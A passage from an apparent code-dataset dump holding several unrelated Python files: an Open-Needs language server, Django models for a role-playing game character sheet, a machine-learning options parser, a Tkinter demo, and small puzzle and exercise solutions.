pass\n\n\n@needs_server.feature(TEXT_DOCUMENT_DID_CHANGE)\ndef did_change(ls, params: DidChangeTextDocumentParams):\n \"\"\"Text document did change notification.\"\"\"\n _validate(ls, params)\n\n\n@needs_server.feature(TEXT_DOCUMENT_DID_CLOSE)\ndef did_close(server: NeedsLanguageServer, params: DidCloseTextDocumentParams):\n \"\"\"Text document did close notification.\"\"\"\n return\n\n\n@needs_server.feature(TEXT_DOCUMENT_DID_OPEN)\nasync def did_open(ls, params: DidOpenTextDocumentParams):\n \"\"\"Text document did open notification.\"\"\"\n _validate(ls, params)\n\n\n@needs_server.feature(INITIALIZED)\ndef did_initialize(ls, params: InitializeParams):\n \"\"\"Server was initialized.\"\"\"\n ls.show_message(\"Initialized Open-Needs IDE Language Server\")\n return True\n\n\n@needs_server.feature(WORKSPACE_DID_CHANGE_CONFIGURATION)\nasync def did_change_workspace_config(ls, params):\n \"\"\"Workspace was initialized.\"\"\"\n ls.show_message(\"Workspace config changed\")\n\n try:\n config = await ls.get_configuration_async(\n ConfigurationParams(\n [ConfigurationItem(\"\", NeedsLanguageServer.CONFIGURATION_SECTION)]\n )\n )\n ls.needs_store.load_needs(os.path.abspath(config[0].needs_file))\n ls.needs_store.set_docs_root(os.path.abspath(config[0].docs_root))\n\n ls.show_message(\n \"using needs in (from ws change): \" + os.path.abspath(config[0].needs_file)\n )\n\n except Exception as e:\n ls.show_message_log(f\"Error ocurred: {e}\")\n\n\n@needs_server.feature(DEFINITION)\nasync def did_definition(ls, params):\n \"\"\"Return location of definition of a need.\"\"\"\n\n if not ls.needs_store.is_setup():\n return\n\n need_type, need_id = get_need_type_and_id(ls, params)\n\n # get need defining doc\n try:\n need = ls.needs_store.needs[need_id]\n except KeyError:\n return None\n\n doc_path = os.path.join(ls.needs_store.docs_root, need[\"docname\"])\n if os.path.exists(doc_path + \".rst\"):\n doc_path = doc_path + \".rst\"\n elif os.path.exists(doc_path + \".rest\"):\n doc_path = doc_path + \".rest\"\n else:\n return None\n doc_uri = pathlib.Path(doc_path).as_uri()\n\n # get the need definition position (line, col) from file\n with open(doc_path) as file:\n source_lines = file.readlines()\n # get the line number\n line_count = 0\n line_no = None\n pattern = f\":id: {need_id}\"\n for line in source_lines:\n if pattern in line:\n line_no = line_count\n break\n line_count = line_count + 1\n if not line_no:\n return None\n\n # get line of directive (e.g., .. req::)\n line_directive = None\n pattern = f\".. {need_type}::\"\n for line_count in range(line_no - 1, -1, -1):\n if pattern in source_lines[line_count]:\n line_directive = line_count\n break\n if not line_directive:\n return None\n\n pos = Position(line=line_directive, character=0)\n return Location(uri=doc_uri, range=Range(start=pos, end=pos))\n\n\n@needs_server.feature(HOVER)\nasync def did_hover(ls, params):\n\n if not ls.needs_store.is_setup():\n return\n\n try:\n need_id = get_need_type_and_id(ls, params)[1]\n except IndexError:\n return None\n if not need_id:\n return None\n\n try:\n title = ls.needs_store.needs[need_id][\"title\"]\n description = ls.needs_store.needs[need_id][\"description\"]\n return Hover(\n contents=MarkupContent(\n kind=MarkupKind.Markdown,\n value=f\"**{title}**\\n\\n```\\n{description}\\n```\",\n )\n )\n except KeyError:\n # need is not in the database\n return None\n\n\n@needs_server.command(NeedsLanguageServer.CMD_UPDATE_SETTINGS)\ndef update_settings(ls, *args):\n \"\"\" \"\"\"\n docs_root = args[0][0]\n needs_file = os.path.join(args[0][1], \"needs\", \"needs.json\")\n\n ls.show_message_log(\"Update settings...\")\n ls.show_message_log(f\"Docs root: {docs_root}\")\n ls.show_message_log(f\"Needs file: {needs_file}\")\n\n try:\n ls.needs_store.set_docs_root(docs_root)\n except Exception as e:\n ls.show_message_log(f\"Something is wrong with Docs root: {docs_root} -> {e}\")\n ls.show_message(\n \"Error setting document root! Are your settings correct?\",\n msg_type=MessageType.Error,\n )\n return\n\n # check if confPath configured\n if len(args[0]) >= 4:\n if args[0][3]:\n # check if path is relative path\n if not os.path.isabs(args[0][3]):\n conf_py_path = os.path.join(os.getcwd(), args[0][3])\n ls.show_message_log(\n f\"Relative confPath is given -> {args[0][3]}, need to caluculate to absolute path -> {conf_py_path}\"\n )\n else:\n conf_py_path = args[0][3]\n ls.show_message_log(f\"Absolute confPath is given -> {conf_py_path}\")\n else:\n ls.show_message_log(\n \"confPath not configured. Using default conf.py under docs root.\"\n )\n conf_py_path = os.path.join(docs_root, \"conf.py\")\n else:\n conf_py_path = os.path.join(docs_root, \"conf.py\")\n\n try:\n ls.needs_store.set_conf_py(conf_py_path)\n except Exception as e:\n ls.show_message_log(\n f\"Something is wrong with configuration file: {conf_py_path} -> {e}\"\n )\n ls.show_message(\n \"Error setting configuration file conf.py\",\n msg_type=MessageType.Error,\n )\n return\n\n try:\n ls.needs_store.set_declared_types()\n ls.show_message_log(f\"Declared need types: {ls.needs_store.declared_types}\")\n except Exception as e:\n ls.show_message_log(\n f\"Something is wrong with declared need types: {ls.needs_store.declared_types} -> {e}\"\n )\n ls.show_message(\n \"Error loading declared needs_types from conf.py\",\n msg_type=MessageType.Error,\n )\n return\n\n try:\n ls.needs_store.load_needs(needs_file)\n # for debugging\n ls.show_message_log(\n f\"Loaded {len(ls.needs_store.needs)} needs from needs.json: {list(ls.needs_store.needs.keys())}\"\n )\n except Exception as e:\n ls.show_message_log(f\"Failed to load needs.json: {needs_file} -> {e}\")\n ls.show_message(\n \"Error loading needs.json! Are your settings correct?\",\n msg_type=MessageType.Error,\n )\n return\n ls.show_message_log(\"Using needs in: \" + os.path.abspath(needs_file))\n","repo_name":"open-needs/open-needs-ide","sub_path":"needls/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":18259,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"25976408432","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import m2m_changed\nfrom django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.core.exceptions import ValidationError\nfrom profile.models import Profile\n\nWAYS_CHOICES = (\n ('Co', 'Combativité'),\n ('Cr', 'Créativité'),\n ('Em', 'Empathie'),\n ('Ra', 'Raison'),\n ('Id', 'Idéal')\n)\n\n\nclass Nation(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='peuple',\n unique=True)\n description = models.TextField(verbose_name='description', blank=True)\n noun = models.CharField(max_length=100,\n verbose_name='nom')\n plural = models.CharField(max_length=100,\n verbose_name='pluriel')\n feminine = models.CharField(max_length=100,\n verbose_name='feminin')\n preposition = models.CharField(max_length=20,\n verbose_name='preposition',\n blank=True)\n\n def __str__(self):\n return self._meta.verbose_name + ' ' + self.preposition + ' ' + self.name\n\n class Meta:\n verbose_name = 'Peuple'\n verbose_name_plural = 'Peuples'\n ordering = (\"name\",)\n\n\nclass Place(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='place',\n unique=True)\n description = models.TextField(verbose_name='description', blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Lieu de résidence'\n verbose_name_plural = 'Lieux de résidences'\n ordering = (\"name\",)\n\n\nclass Discipline(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='nom',\n unique=True)\n description = models.TextField(blank=True,\n verbose_name='description')\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Discipline'\n verbose_name_plural = 'Disciplines'\n ordering = (\"name\",)\n\n\nclass Way(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='Voie',\n unique=True)\n description = models.TextField(verbose_name='description',\n blank=True)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Voie'\n verbose_name_plural = 'Voies'\n ordering = (\"name\",)\n\n\nclass Domain(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='domaine',\n unique=True)\n description = models.TextField(verbose_name='description',\n blank=True)\n way = models.ForeignKey(Way, on_delete=models.CASCADE, related_name='domain')\n disciplines = models.ManyToManyField(Discipline,\n verbose_name='discipline',\n related_name='domains')\n\n def __str__(self):\n return self.name + ' (' + self.way.name[:2] + ')'\n\n class Meta:\n verbose_name = 'Domaine'\n verbose_name_plural = 'Domaines'\n ordering = (\"name\",)\n\n\nclass Social(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='social',\n unique=True)\n description = models.TextField(verbose_name='description',\n blank=True)\n\n domains = models.ManyToManyField(Domain,\n verbose_name='domaines',\n related_name='domains')\n\n def __str__(self):\n return self.name + ' (' + ','.join([domain.name for domain in self.domains.all()]) + ')'\n\n class Meta:\n verbose_name = 'Classe sociale'\n verbose_name_plural = 'Classes sociales'\n ordering = (\"name\",)\n\n\nclass Profession(models.Model):\n name = models.CharField(max_length=100,\n verbose_name='metier',\n unique=True)\n description = models.TextField(verbose_name='description',\n blank=True)\n primary_domain = models.ForeignKey(Domain,\n verbose_name='domaine primaire',\n on_delete=models.SET_NULL,\n null=True,\n related_name='primary_domain')\n secondary_domain = models.ManyToManyField(Domain,\n verbose_name='domaine secondaire',\n related_name='secondary_domain')\n\n def __str__(self):\n return self.name + ' (' + self.primary_domain.name + '), (' + ','.join([sec.name for sec in self.secondary_domain.all()]) + ')'\n\n class Meta:\n verbose_name = 'Metier'\n verbose_name_plural = 'Metiers'\n ordering = (\"name\",)\n\n\nclass Traits(models.Model):\n TRAIT_CHOICE = (\n ('QMAJ', 'Qualité majeur'),\n ('QMIN', 'Qualité mineur'),\n ('FMAJ', 'Défaut majeur'),\n ('FMIN', 'Défaut mineur'),\n )\n name = models.CharField(max_length=100,\n verbose_name='trait de caractère',\n unique=True)\n way = models.ForeignKey(Way, on_delete=models.CASCADE, related_name='traits')\n type_trait = models.CharField(max_length=10, choices=TRAIT_CHOICE)\n\n def __str__(self):\n return self.name + ' (' + str(self.way) + ', ' + self.get_type_trait_display() + ')'\n\n class Meta:\n verbose_name = 'Trait de caractère'\n verbose_name_plural = 'traits de caractères'\n ordering = (\"name\",)\n\n\n#class DomainLevels(models.Model):\n# skill = models.ForeignKey(Domain, null=True, on_delete=models.SET_NULL)\n# level = models.IntegerField()\n# first_domain = models.BooleanField()\n# secondary_domain = models.BooleanField()\n\n# def __str__(self):\n# return self.skill.name + ' niveau ' + str(self.level)\n\n\nclass Setback(models.Model):\n name = models.CharField(max_length=100, verbose_name='nom',\n unique=True)\n description = models.TextField(verbose_name='description',\n blank=True)\n feminine = models.CharField(max_length=100, verbose_name='feminin')\n # rajouter un malus => suivant ce que c'est, sur le truc\n\n class Meta:\n verbose_name = 'Revers'\n verbose_name_plural = 'Revers'\n ordering = (\"name\",)\n\n\n# Un désavantage, au final, c'est aussi un avantage mais négatif !\nclass Advantage(models.Model):\n name = models.CharField(max_length=100, verbose_name='nom',\n unique=True)\n points = models.IntegerField()\n descriptions = models.TextField(verbose_name='description',\n blank=True)\n # bonus : discipline / domaine et nbre de points en plus\n # le bonus peut être aussi textuel : ex : allié il faut le nom de son allié\n # le bonus peut être aussi monetaire : aisance financière...\n # c'est la merde en fait !\n bonus = None\n # on peut faire un avantage++ qui est comme une évolution d'un avantage\n # pour simuler cela, on peut faire un avantage qui requiert d'avoir l'avantage \"niveau n-1\"\n # difficulté de cette méthode : n'afficher que le dernier niveau\n # et savoir s'il faut tenir compte que du bonus du dernier niveau, ou du bonus de tous les autres niveaux\n # donc le bonus serait vu que comme une addition.\n requiert = None\n\n\nclass Personage(models.Model):\n SEXE_CHOICES = (\n ('F', 'Femme'),\n ('H', 'Homme'),\n )\n name = models.CharField(max_length=100, verbose_name='nom')\n genre = models.CharField(max_length=10,\n choices=SEXE_CHOICES)\n birthdate = models.PositiveIntegerField(validators=[MinValueValidator(0), MaxValueValidator(150)],\n default=20)\n nation = models.ForeignKey(Nation, null=True, on_delete=models.SET_NULL,\n verbose_name='peuple')\n profession = models.ManyToManyField(Profession,\n verbose_name='metier',\n related_name='personages')\n description = models.TextField(verbose_name='description',\n blank=True)\n player = models.ForeignKey(Profile, on_delete=models.CASCADE,\n verbose_name='joueur',\n related_name='personages')\n\n advantages = models.ForeignKey(Advantage,\n verbose_name='avantage',\n blank=True,\n null=True,\n on_delete=models.SET_NULL)\n disadvantages = None\n sanity = models.PositiveIntegerField(validators=[MinValueValidator(0), MaxValueValidator(19)],\n default=19)\n\n #survie, vigueur : calculé automatiquement à la création du perso => fonction pour la valeur de base\n # Valeurs stockées = valeurs qui peut être modifié au cours de la partie. A la création c'est utilisé par celle de base\n # ne peut pas dépasser celle de base.\n stamina = None\n survival = None\n\n\n weapons = None\n armor = None\n # potentiel de combat, defense, rapidité : calculé automatiquement\n # score d'attaque calculé automatiquement\n # attitude : automatique, mouvement aussi, protection aussi\n\n # ajouter automatiquement weapon et armor à la liste des équipements quand elle est demandée\n # text ou database equipment qui permet de pouvoir ajouter des élements ? et d'avoir un tracking ?\n equipment = None\n\n artefact = None\n tresor = None\n precious = None\n\n resources = None\n\n # rindath, exaltation calculé automatiquement => sert à la valeur maximal.\n # valeur sauvé = valeur actuel\n rindath = None\n ogham = None\n exaltation = None\n major_miracles = None\n minor_miracles = None\n mineral_flux = None\n vegetal_flux = None\n organic_flux = None\n fossil_flux = None\n\n birthplace = None\n residence = None # Rural / Urban\n social = None\n story = models.TextField(verbose_name='histoire',\n blank=True)\n setback = models.ForeignKey(Setback, null=True, on_delete=models.SET_NULL,\n verbose_name='Revers')\n\n mental_health = models.PositiveSmallIntegerField()\n mental_resistance = models.PositiveSmallIntegerField()\n\n personality = models.TextField(blank=True)\n\n xp = models.PositiveSmallIntegerField(default=0)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name = 'Personnage'\n verbose_name_plural = 'Personnages'\n ordering = (\"name\",)\n\n def profession_changed(sender, **kwargs):\n if kwargs['instance'].profession.count() > 2:\n raise ValidationError(\"Vous ne pouvez pas avoir plus de 2 métiers\")\n\n # This will not work cause m2m fields are saved after the model is saved\n\n def check_xp(self):\n ''' Le choix d'un metier dnne directement un niveau de 5 dans un Domaine de compétence (Domaine Primaire) et\n de 3 dans un domaine secondaire'''\n # Check if primary_domain and secondary_domain are in domain.\n # Check if primary_domain = the same primary domain of profession\n # Check if secondary_domain is in secondary domain of profession\n # Check if primary_domain == 5\n # Check if secondary_domain is 3 min\n # Check if\n\n def clean(self):\n super().clean()\n if self.ways.count() != 5:\n raise ValidationError(\"Il y a {} voies au lieu de 5\".format(self.ways.count()))\n total = 0\n max_min = False\n for way in self.ways.all():\n total += way.level\n if way.level == 1 or way.level == 5:\n max_min = True\n if 15 != total:\n raise ValidationError(\"La somme des voies doit être égal à 15.\")\n if not max_min:\n raise(ValidationError(\"Au moins une voie doit être à 5 ou à 1.\"))\n\n\nclass SkillLevels(models.Model):\n domainLevel = models.ForeignKey(Domain, null=True, on_delete=models.CASCADE)\n level = models.PositiveIntegerField(validators=[MinValueValidator(0), MaxValueValidator(5)])\n FIRST = '1'\n SECOND = '2'\n STANDARD = 'ST'\n TYPES = (\n (FIRST, 'Premier'),\n (SECOND, 'Second'),\n (STANDARD, 'Standard')\n )\n types_domain = models.CharField(max_length=2, choices=TYPES, default=STANDARD)\n personage = models.ForeignKey(Personage, null=True, on_delete=models.CASCADE, related_name='skills')\n\n def __str__(self):\n return self.domainLevel.name + ' niveau ' + str(self.level) + ' avec les disciplines : ' + str(self.disciplineLevel)\n\n # limiter domaine de 1 à 5. (ou de 0 à 5 suivant comment on voit les choses)\n # test si domaine est à 5 pour pouvoir avoir une discipline\n # test si discipline est bien dans le domaine\n # discipline va de 6 à 15\n\n class Meta:\n verbose_name = 'Compétence'\n\n def clean(self):\n super().clean()\n if self.domainLevel in self.personage.skills.all():\n raise(\"Le personnage a déjà ce domaine\")\n if self.types_domain == self.FIRST:\n if self.FIRST == self.personage.skills.all():\n raise(ValidationError(\"Un domaine primaire existe déjà.\"))\n if self.level != 5:\n raise(ValidationError(\"Un domaine primaire est forcément à 5\"))\n if self.types_domain == self.SECOND:\n if self.SECOND == self.personage.skills.all():\n raise(ValidationError(\"Un domaine secondaire existe déjà.\"))\n if self.level < 3:\n raise (ValidationError(\"Un domaine secondaire doit être au minimum à 3\"))\n # si domaine primaire ou secondaire, tester si notre personnage n'a pas deja un primaire (ou secondaire)\n\n\nclass DisciplineLevels(models.Model):\n skill = models.ForeignKey(Discipline, null=True, on_delete=models.SET_NULL)\n level = models.PositiveIntegerField(validators=[MinValueValidator(6), MaxValueValidator(15)])\n skill_level = models.ForeignKey(SkillLevels,\n null=True,\n on_delete=models.CASCADE,\n related_name='discipline_levels')\n\n def __str__(self):\n return self.skill.name + ' niveau ' + str(self.level)\n\n def clean(self):\n super().clean()\n if self.skill_level.domainLevel not in self.skill.domains.all():\n raise(ValidationError(\"La discipline ne fait pas partie du domaine\"))\n if self.skill_level.level != 5:\n raise(ValidationError(\"Le domaine doit être à 5 pour pouvoir prendre une discipline\"))\n\n\nclass WaysLevels(models.Model):\n way = models.ForeignKey(Way, blank=True, on_delete=models.CASCADE, related_name='ways_level')\n level = models.PositiveIntegerField(validators=[MinValueValidator(0), MaxValueValidator(5)])\n personage = models.ForeignKey(Personage, null=True, on_delete=models.CASCADE, related_name='ways')\n","repo_name":"inconnu259/jdr-master","sub_path":"server/personage/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":15541,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29484875960","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport glob\nimport argparse\nimport collections\nimport types\nimport yaml\nimport re\n\nimport myutils\n\nclass YamlLoader(object):\n def __init__(self, file_load):\n if not os.path.exists(file_load):\n errstr = \"ERROR: File {} does not exist, cannot find configuration\"\n print(errstr.format(file_load))\n sys.exit(1)\n with open(file_load, 'r') as f:\n yamldict = yaml.load(f)\n self.__dict__.update(yamldict)\n self.yamldict = yamldict\n\nclass DatasetParams(YamlLoader):\n def __init__(self, opts):\n fname = os.path.join('config', 'datasets', opts.dataset + '.yaml')\n super().__init__(fname)\n self.data_dir=os.path.join(opts.datasets_dir, opts.dataset)\n default_sizes={ 'train': 40000, 'test': 3000 }\n if 'sizes' not in self.__dict__:\n self.sizes = default_sizes\n else:\n for k in default_sizes:\n if k not in self.sizes:\n self.sizes[k] = default_sizes[k]\n\nconfig_len = len('config/datasets/')\nyaml_len = len('.yaml')\ndataset_files = sorted(glob.glob(os.path.join('config','datasets','*.yaml')))\ndataset_choices = [ x[config_len:-yaml_len] for x in dataset_files ]\n\nclass ArchParams(YamlLoader):\n def __init__(self, opts):\n fname = os.path.join('config', 'architectures', opts.architecture+'.yaml')\n super().__init__(fname)\n\narch_files = sorted(glob.glob(os.path.join('config','architectures','*.yaml')))\nconfig_len = len('config/architectures/')\narch_choices = [ x[config_len:-yaml_len] for x in arch_files ]\n\nloss_types = [ 'l2', 'l1', 'l1l2' ]\noptimizer_types = ['sgd','adam','adadelta','momentum','adamw']\nlr_decay_types = ['exponential','fixed','polynomial']\n\n\ndef get_opts():\n \"\"\"Parse arguments from command line and get all options for training.\"\"\"\n parser = argparse.ArgumentParser(description='Train motion estimator')\n # Directory and dataset options\n parser.add_argument('--save_dir',\n default='',\n help='Directory to save out logs and checkpoints')\n parser.add_argument('--checkpoint_start_dir',\n default=None,\n help='Place to load from if not loading from save_dir')\n parser.add_argument('--data_dir',\n default='/NAS/data/stephen/',\n help='Directory for saving/loading dataset')\n parser.add_argument('--rome16k_dir',\n default='/NAS/data/stephen/Rome16K',\n help='Directory for storing Rome16K dataset (Very specific)')\n # 'synth_noise1', 'synth_noise2'\n parser.add_argument('--dataset',\n default=dataset_choices[0],\n choices=dataset_choices,\n help='Choose which dataset to use')\n parser.add_argument('--datasets_dir',\n default='/NAS/data/stephen',\n help='Directory where all the datasets are')\n parser.add_argument('--shuffle_data',\n default=True,\n type=myutils.str2bool,\n help='Shuffle the dataset or no?')\n\n # Architecture parameters\n parser.add_argument('--architecture',\n default=arch_choices[0],\n choices=arch_choices,\n help='Network architecture to use')\n parser.add_argument('--final_embedding_dim',\n default=None,\n type=int,\n help='Dimensionality of the output')\n\n # Machine learning parameters\n parser.add_argument('--batch_size',\n default=32,\n type=int,\n help='Size for batches')\n # TODO: Combine next two to add post-processing option\n parser.add_argument('--use_clamping',\n default=False,\n type=myutils.str2bool,\n help='Use clamping to [0, 1] on the output similarities')\n parser.add_argument('--use_abs_value',\n default=False,\n type=myutils.str2bool,\n help='Use absolute value on the output similarities')\n parser.add_argument('--loss_type',\n default=loss_types[0],\n choices=loss_types,\n help='Loss function to use for training')\n parser.add_argument('--reconstruction_loss',\n default=1.0,\n type=float,\n help='Use true adjacency or noisy one in loss')\n parser.add_argument('--geometric_loss',\n default=-1,\n type=float,\n help='Weight to use on the geometric loss')\n parser.add_argument('--weight_decay',\n default=4e-5,\n type=float,\n help='Weight decay regularization')\n parser.add_argument('--weight_l1_decay',\n default=0,\n type=float,\n help='L1 weight decay regularization')\n parser.add_argument('--optimizer_type',\n default=optimizer_types[0],\n choices=optimizer_types,\n help='Optimizer type for adaptive learning methods')\n parser.add_argument('--learning_rate',\n default=1e-3,\n type=float,\n help='Learning rate for gradient descent')\n parser.add_argument('--momentum',\n default=0.6,\n type=float,\n help='Learning rate for gradient descent')\n parser.add_argument('--learning_rate_decay_type',\n default=lr_decay_types[0],\n choices=lr_decay_types,\n help='Learning rate decay policy')\n parser.add_argument('--min_learning_rate',\n default=1e-5,\n type=float,\n help='Minimum learning rate after decaying')\n parser.add_argument('--learning_rate_decay_rate',\n default=0.95,\n type=float,\n help='Learning rate decay rate')\n parser.add_argument('--learning_rate_continuous',\n default=False,\n type=myutils.str2bool,\n help='Number of epochs before learning rate decay')\n parser.add_argument('--learning_rate_decay_epochs',\n default=4,\n type=float,\n help='Number of epochs before learning rate decay')\n\n # Training options\n parser.add_argument('--train_time',\n default=-1,\n type=int,\n help='Time in minutes the training procedure runs')\n parser.add_argument('--num_epochs',\n default=-1,\n type=int,\n help='Number of epochs to run training')\n parser.add_argument('--test_freq',\n default=-1,\n type=int,\n help='Minutes between running loss on test set.'\n 'If less than zero, does not check time for testing')\n parser.add_argument('--test_freq_steps',\n default=-1,\n type=int,\n help='Number of steps between running loss on test set'\n 'If less than zero, does not check steps for testing')\n\n # Logging options\n parser.add_argument('--verbose',\n default=False,\n type=myutils.str2bool,\n help='Print out everything')\n parser.add_argument('--save_summaries_secs',\n default=120,\n type=int,\n help='How frequently in seconds we save training summaries')\n parser.add_argument('--save_interval_secs',\n default=600,\n type=int,\n help='Frequency in seconds to save model while training')\n parser.add_argument('--log_steps',\n default=5,\n type=int,\n help='How frequently we print training loss')\n\n # Debugging options\n parser.add_argument('--debug',\n default=False,\n type=myutils.str2bool,\n help='Run in debug mode')\n\n\n opts = parser.parse_args()\n\n ##### Post processing\n # Dataset\n dataset_params = DatasetParams(opts)\n opts.data_dir = dataset_params.data_dir\n if opts.final_embedding_dim is None:\n opts.final_embedding_dim = dataset_params.points[-1]\n setattr(opts, 'dataset_params', dataset_params)\n\n # Set up architecture\n arch = ArchParams(opts)\n setattr(opts, 'arch', arch)\n\n # Save out directory\n if opts.save_dir == '':\n print(''.join([ '=' ] * 20), file=sys.stderr)\n print('WARNING: save_dir not set, '\n 'going to default /tmp/discard_dir', file=sys.stderr)\n print(''.join([ '=' ] * 20), file=sys.stderr)\n opts.save_dir = '/tmp/discard_dir'\n if os.path.exists(opts.save_dir):\n import shutil\n shutil.rmtree(opts.save_dir)\n os.makedirs(opts.save_dir)\n elif not os.path.exists(opts.save_dir):\n os.makedirs(opts.save_dir)\n\n # Checkpoint loading\n if opts.checkpoint_start_dir and not os.path.exists(opts.checkpoint_start_dir):\n print(\"ERROR: Checkpoint Directory {} does not exist\".format(opts.checkpoint_start_dir))\n return\n\n yaml_fname = os.path.join(opts.save_dir, 'options.yaml')\n if not os.path.exists(yaml_fname):\n with open(yaml_fname, 'w') as yml:\n yml.write(yaml.dump(opts.__dict__))\n\n # Finished, return options\n return opts\n\ndef parse_yaml_opts(opts):\n with open(os.path.join(opts.save_dir, 'options.yaml'), 'r') as yml:\n yaml_opts = yaml.load(yml)\n opts.__dict__.update(yaml_opts)\n return opts\n\n\n","repo_name":"stephenphillips42/cycleconsistencynet","sub_path":"options.py","file_name":"options.py","file_ext":"py","file_size_in_byte":9943,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"41683568665","text":"# Python Tkinter How Validate an Entry Widget Integer\n# Python Tkinter Cómo validar un entero de widget de entrada\n\nfrom tkinter import *\n\nroot = Tk()\nroot.title('Python Tkinter How Validate an Entry Widget Integer')\nroot.iconbitmap('Python Tkinter How Validate an Entry Widget Integer/api.ico')\nroot.geometry(\"400x400\")\n\ndef number():\n try:\n int(my_box.get())\n answer.config(text=\"That is a number! Congrats!\")\n \n except ValueError:\n answer.config(text=\"That is NOT number! Congrats!\")\n\n\nmy_label = Label(root, text=\"Enter a Number\")\nmy_label.pack(pady=20)\n\nmy_box = Entry(root)\nmy_box.pack(pady=10)\n\nmy_button = Button(root, text=\"Entre a Number\", command=number)\nmy_button.pack(pady=5)\n\nanswer = Label(root, text=\"\")\nanswer.pack(pady=5)\n\n\nroot.mainloop()\n\n\n","repo_name":"BrianMarquez3/Python-Course","sub_path":"Python Tkinter How Validate an Entry Widget Integer/howValidadeEntryWidgetInteger.py","file_name":"howValidadeEntryWidgetInteger.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"48"} +{"seq_id":"29032267261","text":"from collections import deque\n\ndef maxDigitProductFromFile(file_name: str, n: int) -> int:\n f = open(file_name, \"r\")\n max_product = 0\n product = 1\n window = deque([])\n for line in f:\n for char in line.rstrip():\n num = int(char)\n if num == 0:\n window.clear()\n product = 1\n continue\n if len(window) < n:\n window.append(num)\n product *= num\n else:\n head = window.popleft()\n window.append(num)\n product = (product // head) * num\n if product > max_product:\n max_product = product\n return max_product\n\nresult = maxDigitProductFromFile(\"./8_input.txt\", 13)\nprint(result)\n","repo_name":"lesterfernandez/euler","sub_path":"p8_largest_product_in_series.py","file_name":"p8_largest_product_in_series.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73276492625","text":"'''\nProblem link:\nhttps://www.hackerrank.com/challenges/one-month-preparation-kit-lonely-integer/problem?isFullScreen=true&h_l=interview&playlist_slugs%5B%5D=preparation-kits&playlist_slugs%5B%5D=one-month-preparation-kit&playlist_slugs%5B%5D=one-month-week-one\n'''\n\n'''\nSteps to solve the problem.\n- First step - Create a set (uniques) by transforming the list (ar).\n- Second traverse the set (uniques) and find count() on the list (ar) with each\n unique value from the set.\n-Third divide those values(find in the last step) between 2 and save the entire\n result at pairs variable.\n- Fourth return that variable. \n'''\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\ndef lonelyinteger(ar):\n # Write your code here\n uniques = set(ar)\n\n for unique in uniques:\n if ar.count(unique) == 1:\n return unique\n\n return -1\n\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input().strip())\n\n ar = list(map(int, input().rstrip().split()))\n\n result = lonelyinteger(ar)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"Thevic16/python_competitive_programming_problems","sub_path":"problems/others_problems/codeforcers_ladder/3-lonely_integer.py","file_name":"3-lonely_integer.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2134836205","text":"#!/usr/bin/env python3\nimport math\n\ndef fakultet(n):\n product = 1\n for number in range(2, n+1):\n product *= number\n return product\n\ndef taylor_sin(x):\n \"\"\"\n We know that e.g.\n sin(x) = x - x^3/3! + x^5/5! -x^7/7! + x^9/9!\n \n This function calculates sin using this formula.\n Maximum error is given by the EPSILON variable\n \"\"\"\n #term is our last calculated term (starting with the first term)\n sum_ = 0\n term = x\n \n EPSILON = 1e-10\n k = 1 # k corresponds to \"x^k/k!\" in a term\n sign = 1 # 1 or -1, start with the -1\n while abs(term) > EPSILON:\n term = sign * x**k / fakultet(k)\n sum_ += term\n sign = -sign\n k += 2\n \n return sum_\n\ndef test_taylor_sin():\n MAX_ACCEPTED_ERROR = 1e-5\n \n START_T = -10.0\n END_T = 10.0\n NUM_TESTS = 100\n step = (END_T - START_T) / NUM_TESTS\n \n t = START_T\n while t < END_T:\n t += step\n error = abs(taylor_sin(t) - math.sin(t))\n assert error < MAX_ACCEPTED_ERROR\n \ntest_taylor_sin()\n\nt = 0.37\nprint(\"t =\", t)\nprint(\"taylor_sin:\", taylor_sin(t))\nprint(\"math.sin: \", math.sin(t))\nprint()\n\nt = 2.16\nprint(\"t =\", t)\nprint(\"taylor_sin:\", taylor_sin(t))\nprint(\"math.sin: \", math.sin(t))\nprint()\n","repo_name":"Ran4/dd1331-public","sub_path":"ex02/ran_sin.py","file_name":"ran_sin.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74040058386","text":"from instaclient import LOGGER\nfrom typing import List, Optional, TYPE_CHECKING\nimport json\n\nif TYPE_CHECKING:\n from instaclient.client.instaclient import InstaClient\n\nclass Address():\n def __init__(self, address:str, **kwargs):\n try:\n data = json.loads(address)\n self.street_address = data.get('street_address')\n self.zip_code = data.get('zip_code')\n self.city_name = data.get('city_name')\n self.region_name =data.get('region_name')\n self.country_code = data.get('country_code')\n self.exact_city_match = data.get('exact_city_match')\n self.exact_region_match = data.get('exact_region_match')\n self.exact_country_match = 